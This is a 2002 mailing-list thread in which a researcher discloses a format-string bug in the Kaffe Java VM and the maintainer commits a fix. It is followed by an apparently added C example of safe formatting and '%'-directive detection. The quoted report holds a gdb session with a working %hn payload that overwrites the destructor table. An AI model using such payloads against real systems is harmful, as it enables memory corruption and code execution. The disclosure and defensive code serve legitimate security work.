Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick jim at kaffe.org
Fri Apr 12 21:38:10 PDT 2002


I don't think anybody behind those email addresses was paying any attention
a few months ago.  :-)

We've got a lot of work to do on the security front yet, but it would be
good if we can get rid of some of the obvious bugs as soon as they are
identified.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash at snosoft.com>
To: "Jim Pick" <jim at kaffe.org>
Cc: <kaffe at rufus.w3.org>; <recon at snosoft.com>
Sent: Friday, April 12, 2002 10:05 PM
Subject: Re: Kaffe Exploit is almost finished... second warning for format strings issue.


> No problem... do you know why this went unnoticed for a while? I think I
> mailed it to every mail address I could find on your web site a few
> months back... I even tried to stuff it in your online bug form thing.
>
> My concern was for things along the line of JanOS and KaffeOS... or java
> network apps that allow clients to make class requests... servlet
> engines and things of that nature...
> -KF
>
>
> Jim Pick wrote:
>
> >Oooh, that's bad.
> >
> >I just committed a fix.  Thanks for the heads up.
> >
> >Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe to
> >run untrusted code until we've fully implemented things like the verifier.
> >I'll cc: the list so that people know about this.
> >
> >Cheers,
> >
> > - Jim
> >
> >----- Original Message -----
> >From: "KF" <dotslash at snosoft.com>
> >To: <jim at kaffe.org>
> >Sent: Friday, April 12, 2002 8:03 AM
> >Subject: Kaffe Exploit is almost finished... second warning for format strings issue.
> >
> >
> >>0804b6c8 ? __DTOR_END__
> >>[itchie at ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> >>(gdb) r  AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
> >>        at java.lang.Class.forName(Class.java:native)
> >>        at java.lang.Class.forName(Class.java:52)
> >>
> >>Program received signal SIGSEGV, Segmentation fault.
> >>0xbfffff9a in ?? ()
> >>
> >>
> >>-KF
> >>
> >>
> >>
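The class of bug shown in the gdb session above, as an added defensive illustration that is not Kaffe's code: the class name handed to Class.forName() must only ever be a printf argument, never the format string, and counting `%` directives in a class-load request is a cheap detection signal. The function names and the exact message text are assumptions.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added illustration, not Kaffe's code. The class name a caller passes to
 * Class.forName() is untrusted input. The unsafe pattern is
 *     snprintf(out, outsz, class_name);
 * where the name itself becomes the format string, so "%x"/"%hn" sequences
 * in it are interpreted, as the gdb session above demonstrates. The version
 * below always keeps the name as data behind a fixed format.
 */
int build_error_message(char *out, size_t outsz, const char *class_name)
{
    int n = snprintf(out, outsz, "java.lang.NoClassDefFoundError: %s",
                     class_name);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                 /* encoding error or truncated output */
    return n;                      /* bytes written, excluding the NUL */
}

/*
 * Detection aid: count '%' conversion specifiers in an untrusted string.
 * "%%" is a literal percent sign and is not counted. A valid Java class
 * name never contains '%', so a nonzero count on a class-load request is
 * worth logging or rejecting before the name reaches any formatting code.
 */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {         /* escaped percent: skip the pair */
            s++;
            continue;
        }
        count++;
    }
    return count;
}
```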